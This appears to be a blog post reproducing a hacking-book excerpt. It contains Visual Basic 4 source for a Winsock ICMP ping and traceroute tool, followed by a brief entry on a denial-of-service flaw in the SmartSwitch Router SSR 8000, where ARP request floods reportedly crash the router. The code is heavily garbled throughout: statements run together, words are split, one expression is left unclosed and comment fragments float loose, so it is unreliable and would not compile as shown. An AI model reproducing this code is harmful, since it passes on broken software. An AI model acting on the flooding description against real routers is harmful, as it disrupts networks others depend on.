Chr$(13) + Chr$(10) End If End If Next NbrOfPkts End Sub
Sub vbWSACleanup()
' Subroutine to perform WSACleanup iReturn = WSACleanup()
If iReturn <> 0 Then ' If WSock32 error, then tell me abo
ut
it.
sMsg = "WSock32 Error -" & Trim$(Str$(iReturn)) & " occurred in Cleanup"
MsgBox sMsg, vbOKOnly, "VB4 032-ICMPEcho" End End If End Sub
Sub vbWSAStartup()
iReturn = WSAStartup(&H101, WSAdata)
If iReturn <> 0 Then ' If WSock32 error, then tell me about
it
MsgBox "WSock32.dll is not responding!", vbOKOnly, "VB4032-ICMPEcho" End If
If LoByte(WSAdata.wVersion) < WS_VERSION_MAJOR Or (LoByte(WSAdata.wVersion) = WS_VERSION_MAJOR And HiByte(WSAdata.wVersion) < WS_VERSION_MINOR) Then
sHighByte = Trim$(Str$(HiByte(WSAdata.wVersion))) sLowByte = Trim$(Str$(LoByte(WSAdata.wVersion))) sMsg = "WinSock Version " & sLowByte & "." & sHighByte sMsg = sMsg & " is not supported "
MsgBox sMsg, vbOKOnly, "VB4032-ICMPEcho" End End If
If WSAdata.iMaxSockets < MIN_SOCKETS_REQD Then
sMsg = "This application requires a minimum of "
sMsg = sMsg & Trim$(Str$(MIN_SOCKETS_REQD)) & " supported
sockets."
MsgBox sMsg, vbOKOnly, "VB4032-ICMPEcho" End End If
MaxSockets = WSAdata.iMaxSockets If MaxSockets < 0 Then
MaxSockets = 65536 + MaxSockets
End If
MaxUDP = WSAdata.iMaxUdpDg
If MaxUDP < 0 Then
MaxUDP = 65536 + MaxUDP
End If
description = ""
For i = 0 To WSADESCRIPTION_LEN
If WSAdata.szDescription(i) = 0 Then Exit For description = description + Chr$(WSAdata.szDescription(i
Next i
Status = ""
For i = 0 To WSASYS_STATUS_LEN
If WSAdata.szSystemStatus(i) = 0 Then Exit For Status = Status + Chr$(WSAdata.szSystemStatus(i))
Next i End Sub
Private Sub Command1_Click() Text3.Text = ""
vbWSAStartup ' Initialize Winsock
If Len(Text1.Text) = 0 Then
vbGetHostName
End If
If Text1.Text = "" Then
MsgBox "No Hostname Specified!", vbOKOnly, "VB4032-ICMPEcho"
' Complain if No Host Name Identified
vbWSACleanup Exit Sub End If
vbGetHostByName ' Get the IPAddress for the Host
vbIcmpCreateFile ' Get ICMP Handle
' The following determines the TTL of the ICMPEcho
If IsNumeric(Text2.Text) Then
If (Val(Text2.Text) > 255) Then Text2.Text = "255" If (Val(Text2.Text) < 2) Then Text2.Text = "2"
Else
Text2.Text = "255" End If
pIPo.TTL = Trim$(Text2.Text)
vbIcmpSendEcho ' Send the ICMP Echo Request
vbIcmpCloseHandle ' Close the ICMP Handle
vbWSACleanup ' Close Winsock
End Sub
Private Sub Command2_Click()
Text3.Text = "" End Sub
Private Sub Command3_Click()
Text3.Text = ""
vbWSAStartup ' Initialize Winsock
If Len(Text1.Text) = 0 Then
vbGetHostName
End If
If Text1.Text = "" Then
MsgBox "No Hostname Specified!", vbOKOnly, "VB4032-ICMPEcho"
' Complain if No Host Name Identified vbWSACleanup Exit Sub End If
vbGetHostByName ' Get the IPAddress for the Host
vbIcmpCreateFile ' Get ICMP Handle
' The following determines the TTL of the ICMPEcho for TRACE function
TraceRT = True
Text3.Text = Text3.Text + "Tracing Route to " + Label3.Caption
+
+ Chr$(13) + Chr$(10) + Chr$(13) + Chr$(10)
For TTL = 2 To 255 pIPo.TTL = TTL
vbIcmpSendEcho ' Send the ICMP Echo Request
DoEvents
If RespondingHost = Label3.Caption Then
Text3.Text = Text3.Text + Chr$(13) + Chr$(10) + "Route
Trace
has Completed" + Chr$(13) + Chr$(10) + Chr$(13) + Chr$(10)
Exit For
End If Next TTL TraceRT = False vbIcmpCloseHandle vbWSACleanup End Sub
Stop TraceRT
Close the ICMP Handle
Close Winsock
ICMP.bas:
Type Inet_address
Byte4 As String * 1 Byte3 As String * 1 Byte2 As String * 1 Byte1 As String * 1
End Type
Public IPLong As Inet_address Type WSAdata
wVersion As Integer
wHighVersion As Integer szDescription(0 To 255) As Byte
szSystemStatus(0 To 128) As Byte
iMaxSockets As Integer
iMaxUdpDg As Integer
lpVendorInfo As Long End Type Type Hostent
h_name As Long
h_aliases As Long
h_addrtype As Integer
h_length As Integer
h_addr_list As Long
End Type
Time to Live (used for traceroute) Type of Service (usually 0) IP header Flags (usually 0) Size of Options data (usually 0, ma
' Options data buffer
Type IP_OPTION_INFORMATION
TTL As Byte '
Tos As Byte '
Flags As Byte '
OptionsSize As Long '
x 40)
OptionsData As String * 128 End Type
Replying Address Reply Status Round Trip Time
Public pIPo As IP_OPTION_INFORMATION Type IP_ECHO_REPLY
Address(0 To 3) As Byte
in millisec
Status As Long
RoundTripTime As Long
reply data size for system use pointer to echo data Reply Options
onds
DataSize As Integer Reserved As Integer dat a As Long
Options As IP_OPTION_INFORMATION
End Type
Public pIPe As IP_ECHO_REPLY
Declare Function gethostname Lib "wsock32.dll" (ByVal hostname$,
HostLen&) As Long Declare Function gethostbyname& Lib "wsock32.dll" (ByVal hostname$) Declare Function WSAGetLastError Lib "wsock32.dll" () As Long Declare Function WSAStartup Lib "wsock32.dll" (ByVal wVersionRequir ed&,
lpWSAData As WSAdata) As Long Declare Function WSACleanup Lib "wsock32.dll" () As Long Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (hpvDes
t As
Any, hpvSource As Any, ByVal cbCopy As Long) Declare Function IcmpCreateFile Lib "icmp.dll" () As Long Declare Function IcmpCloseHandle Lib "icmp.dll" (ByVal HANDLE As Lo ng)
As Boolean
Declare Function IcmpSendEcho Lib "ICMP" (ByVal IcmpHandle As Long, ByVal DestAddress As Long, _
ByVal RequestData As String, ByVal RequestSize As Integer,
RequestOptns As IP_OPTION_INFORMATION, _
ReplyBuffer As IP_ECHO_REPLY, ByVal ReplySize As Long, ByVal TimeOut As Long) As Boolean
Denial-of-Service Attack
Synopsis: There is a DoS vulnerability in the SmartSwitch Router (SSR). Hack State: Processing interference with flooding. Vulnerabilities: SSR 8000 running firmware revision 2.x.
Breach: This bottleneck appears to occur in the ARP-handling mechanism of the SSR. Sending an abundance of ARP requests restricts the SSR, causing the router to stop processing. Anonymous attackers crash the SSR by customizing programs like icmp.c (which is available from the Tiger Tools repository on this book's CD).
No comments:
Post a Comment